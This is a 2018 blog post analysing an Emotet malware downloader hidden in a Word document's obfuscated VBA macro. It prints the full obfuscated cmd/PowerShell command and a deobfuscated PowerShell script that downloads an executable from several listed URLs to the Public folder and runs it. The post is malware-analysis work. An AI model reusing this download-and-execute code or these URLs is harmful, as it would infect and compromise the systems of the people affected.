Sunday, May 6, 2018

Analysing Word VBA Downloader for Emotet Malware

I found pretty fresh samples of Emotet downloader code from https://www.malware-traffic-analysis.net/2018/05/04/index.html and decided to do a quick deobfuscation of the code.

First phase is obfuscated VBA code in Word document. If you open the document you will see familiar Office 365 logo. You will see also suggestions to Enable Editing or Enable Content which would execute VBA code.


Anyway the VBA code is pretty heavily obfuscated with lots of unnecessary code.


Code execution starts from module ujDjvvQ which is renamed ThisDocument. Module contains Autoopen function which can be simplified:

Sub Autoopen()
 On Error Resume Next
 TiOoQjQV( nFODYizhYv )
End Sub

Function TiOoQjQV contains shell function and the argument is mostly deobfuscated code.

Deobfuscation function resides in module srYodFmNbnD, and it can be simplified to:

Function OUtvU(ByVal ciUzkrCSLkWBnW As String, TLAaHGLpbjzzY, oYFjLnWNLj)
 On Error Resume Next
 SCXkhnfEKHM = Mid(StrReverse(ciUzkrCSLkWBnW), TLAaHGLpbjzzY, oYFjLnWNLj)
 OUtvU = SCXkhnfEKHM 
End Function

In effect function OUtvU is a wrapper to mid function. A little twist is first reversing string with StrReverse.

Shell function resides in module DnaCdFskcp and it's simplified as:

Sub TiOoQjQV(qFkOSjfj As String)
 On Error Resume Next
 [Shell] Chr(vbKeyC) + qFkOSjfj, 0
End Sub

The argument for shell function i.e. parameter's qFkOSjfj value is:

md jVpSwjvTz zCLlIDOdohUVOziMjRLUbTKVir okGWmYP & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %kzwhjFmUVUOiJkk%=kcwKnsUZV&&set %atDQwjOtB%=p&&set %nFODYizhYv%=o^w&&set %lFhJFzoEwJVsjOS%=WdjEbhWvCv&&set %ciUzkrCSLkWBnW%=!%atDQwjOtB%!&&set %iriHrfYMvAFLQXZ%=NaOWDOflQPn&&set %TiOoQjQV%=e^r&&set %SCXkhnfEKHM%=!%nFODYizhYv%!&&set %qFkOSjfj%=s&&set %VtDjlGJSzZpSqTU%=SULNJfBUv&&set %oYFjLnWNLj%=he&&set %TLAaHGLpbjzzY%=ll&&!%ciUzkrCSLkWBnW%!!%SCXkhnfEKHM%!!%TiOoQjQV%!!%qFkOSjfj%!!%oYFjLnWNLj%!!%TLAaHGLpbjzzY%! " . ( $env:comSpeC[4,26,25]-JoIn'')( (('ZmInsa'+'dasd = &('+'g'+'36n'+'g36+g36eg36+g'+'3'+'6'+'w'+'-obj'+'ecg36+g'+'36tg3'+'6'+') random;Z'+'m'+'I'+'YYU = .(g36ne'+'g3'+'6'+'+g'+'36'+'wg36+g36-obj'+'ectg36) Sys'+'tem.Ne'+'t.We'+'bC'+'li'+'ent;'+'Zm'+'INSB ='+' ZmInsa'+'d'+'a'+'sd.nex'+'t(10'+'000, 282'+'1'+'3'+'3);Z'+'mIAD'+'CX'+' = g3'+'6 http'+':'+'//'+'a'+'lian'+'.'+'d'+'e'+'/'+'4wBY'+'ki/@'+'http://agai'+'nstpe'+'rfect'+'ion.net/6'+'kWq0/@'+'ht'+'t'+'p'+'://globalreach'+'adv '+'ertising.'+'com/zfFg'+'SQ/'+'@htt'+'p://www.'+'fanoff.com/Z'+'VljVr/'+'@'+'h'+'ttp'+'://thur'+'tell.co'+'m/TCyk/g'+'3'+'6'+'.S'+'plit(g3'+'6@'+'g'+'3'+'6);ZmI'+'S'+'DC '+'= ZmIe'+'nv:pu'+'bl'+'i'+'c + g3'+'6Dcfg36 +'+' Zm'+'INSB +'+' (g'+'3'+'6'+'.exg36'+'+g3'+'6eg36);fo'+'reach'+'(Z'+'mIasfc'+' '+'in ZmI'+'AD'+'CX){t'+'ry{ZmIYYU.sH6Do'+'0mIWn'+'l0mIOa'+'dFI'+'0mI'+'lesH6('+'ZmI'+'asfc.sH6ToStr0mIi0'+'m'+'INgsH6(),'+' ZmI'+'SDC)'+';&(g36Inv'+'og'+'3'+'6+'+'g36'+'k'+'g'+'36+g36e'+'-It'+'emg36'+')(Z'+'m'+'I'+'SDC'+');bre'+'ak;}catch'+'{}'+'}') -repLACE '0mI',[chaR]96 -repLACE([chaR]68+[chaR]99+[chaR]102),[chaR]92-cREPLACE 'g36',[chaR]39 -cREPLACE ([chaR]90+[chaR]109+[chaR]73),[chaR]36 -cREPLACE ([chaR]115+[chaR]72+[chaR]54),[chaR]34) )

This script code has two parts. First part is DOS code which creates a folder and sets environment variables that evaluate to string 'powershell'. Second part is obfuscated powershell code.

To analyse powershell code, I first made a replace table:
Replace Table
  • 0mI  ' 
  • ZmI $ 
  • g36  ' 
  • Dcf  \ 
  • sH6 *

Finally I deobfuscated powershell code as (excluding Replace functions):

( $env:comSpeC[4,26,25]-JoIn)( (('
 $nsadasd = &('new-object) random;
 $YYU = .('new-object')System.Net.WebClient;
 $NSB =$nsadasd.next(10000, 282133);
 $ADCX = '
 http://alian.de/4wBYki/@
 http://againstperfection.net/6kWq0/@
 http://globalreachadvertising.com/zfFgSQ/@
 http://www.fanoff.com/ZVljVr/@
 http://thurtell.com/TCyk/
 '.Split('@');
 $SDC = $env:public + '\' + $NSB + ('.exe');
 foreach($asfc in $ADCX)
 {try{$YYU.*DoWnlOadFIle*($asfc.*ToStriNg*(), $SDC);
 &('Invoke-Item')($SDC); 
 break;}
catch{}})

Obfuscation method in VBA code resembles very much the code in: A sample analysis walkthrough with RETouch: Testing a new feature. I guess they are both made with the same malware or obfuscation kit.